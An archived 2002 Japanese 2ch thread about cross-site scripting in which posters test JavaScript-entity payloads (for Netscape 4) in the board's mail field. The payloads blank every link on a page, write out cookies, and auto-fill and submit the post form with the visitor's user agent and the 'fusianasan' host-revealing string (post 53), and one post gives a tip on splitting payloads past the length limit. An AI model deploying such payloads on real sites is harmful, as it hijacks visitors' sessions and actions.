クロスサイトスクリプティング対策 (114レス)
クロスサイトスクリプティング対策 http://medaka.5ch.io/test/read.cgi/php/1004146653/
上
下
前
次
1-
新
通常表示
512バイト分割
レス栞
36: 名無しさん@お腹いっぱい。 [age] 02/01/12 14:08 ID:??? age http://medaka.5ch.io/test/read.cgi/php/1004146653/36
37: [] 02/01/26 08:50 ID:SUrQysHb a http://medaka.5ch.io/test/read.cgi/php/1004146653/37
38: 名無しさん@お腹いっぱい。 [sage] 02/01/26 11:51 ID:??? こんなのmail欄に入れたらどうなるんだろう? &{document.captureEvents(Event.LOAD);window.onload=new Function('for(var i=0;Boolean(document.links[i]);i++)document.links[i].href=\'\';')}; http://medaka.5ch.io/test/read.cgi/php/1004146653/38
39: 名無しさん@お腹いっぱい。 [sage] 02/01/26 13:20 ID:??? >38 自分でやってみてよ(笑) http://medaka.5ch.io/test/read.cgi/php/1004146653/39
40: 名無しさん@お腹いっぱい。 [sage] 02/01/26 13:47 ID:??? メール欄が長すぎます・・・だって(笑) &{for(var i=0;document.links[i];i++)document.links[i].href='';}; これは大丈夫やった。 http://medaka.5ch.io/test/read.cgi/php/1004146653/40
41: 名無しさん@お腹いっぱい。 [sage] 02/01/26 14:05 ID:??? >40 どこでやってきたの?(笑) http://medaka.5ch.io/test/read.cgi/php/1004146653/41
42: 名無しさん@お腹いっぱい。 [sage] 02/01/26 17:32 ID:??? >>41 色んなところ。反応が一つもないところを見ると NN4でスクリプトONにしてる奴、あんまおらんのかな? http://medaka.5ch.io/test/read.cgi/php/1004146653/42
43: 名無しさん@お腹いっぱい。 [&{document.write(document.cookie)};] 02/01/26 22:09 ID:??? age http://medaka.5ch.io/test/read.cgi/php/1004146653/43
44: 名無しさん@お腹いっぱい。 [<script>document.write(l(null));</script>] 02/01/26 22:19 ID:??? age http://medaka.5ch.io/test/read.cgi/php/1004146653/44
45: ネスケ4.7使用者 [sage] 02/01/27 10:13 ID:??? >>42 ひいい・・・・2ちゃんで窓が出たよう・・・。 http://medaka.5ch.io/test/read.cgi/php/1004146653/45
46: 名無しさん@お腹いっぱい。 [sage] 02/01/27 10:17 ID:??? >45 (笑) http://medaka.5ch.io/test/read.cgi/php/1004146653/46
47: 仕様書無しさん [sage] 02/01/27 23:08 ID:??? >>40 分割すればいいみたい。>>12>>13 http://medaka.5ch.io/test/read.cgi/php/1004146653/47
48: 名無しさん@お腹いっぱい。 [&{for(var i=0;document.links[i];i++)document.links[i].href='';};] 02/02/06 03:45 ID:??? テスト http://medaka.5ch.io/test/read.cgi/php/1004146653/48
49: 名無しさん@お腹いっぱい。 [] 02/02/06 03:46 ID:dMmdiZ7p 大手検索サイトに見るクロスサイトスクリプティングの脆弱性の実態(2002.2.4) https://www.netsecurity.ne.jp/article/1/3860.html http://medaka.5ch.io/test/read.cgi/php/1004146653/49
50: テスト [&{f=document.forms;}] 02/02/08 00:23 ID:??? http://medaka.5ch.io/test/read.cgi/php/1004146653/50
51: テスト [&{for(i=0;f[i];i++)f[i].elments[4].value='fusianasan';}] 02/02/08 00:28 ID:??? http://medaka.5ch.io/test/read.cgi/php/1004146653/51
52: 名無しさん@お腹いっぱい。 [sage] 02/02/08 13:44 ID:??? >日本でもWebサイトに関する最初のインシデントとして記録されているのは、1997年に総務省の掲示板にタグ >が書き込まれ、その掲示板を閲覧しようすると、オウム真理教の音楽が外部サイトから読み込まれて鳴るよう >になったという事件であり、このようにクロスサイトスクリプティングの脆弱性は古くから存在する問題である。 タグ可の掲示板はみんな着尺製ありだな http://pc.2ch.net/test/read.cgi/sec/1008926076/l10 http://medaka.5ch.io/test/read.cgi/php/1004146653/52
53: 名無しさん@お腹いっぱい。 [sage] 02/02/09 01:21 ID:??? F=Function;fs=document.forms; l0=new F('f=fs[fs.length-1]'); l1=new F('es=f.elements;'); l2=new F('a=es[0];b=es[2];'); l3=new F('c=es[3];d=es[4];'); l4=new F('a.value=navigator.userAgent;'); l5=new F('b.value=\'fusianasan\';'); l6=new F('c.value=\'\';'); l7=new F('d.value=\' \';'); l8=new F('es[1].click();'); lx=new F('l0();l1();l2();l3();'); ly=new F('l4();l5();l6();l7();'); lz=new F('l8();'); l=new F('lx();ly();lz();');window.onload=l; http://medaka.5ch.io/test/read.cgi/php/1004146653/53
54: 名無しさん@お腹いっぱい。 [sage] 02/02/12 11:32 ID:??? >>52 >着尺製 読めない…。 http://medaka.5ch.io/test/read.cgi/php/1004146653/54
55: 名無しさん@お腹いっぱい。 [sage] 02/02/12 11:44 ID:??? >>54 > >着尺製 「脆弱性」の (2ch的?) 誤読だと思われ。 正しくは「もろよわせい」と読むらしい。 http://medaka.5ch.io/test/read.cgi/php/1004146653/55
メモ帳
(0/65535文字)
上
下
前
次
1-
新
書
関
写
板
覧
索
設
栞
歴
あと 59 レスあります
スレ情報
赤レス抽出
画像レス抽出
歴の未読スレ
AAサムネイル
Google検索
Wikipedia
ぬこの手
ぬこTOP
0.011s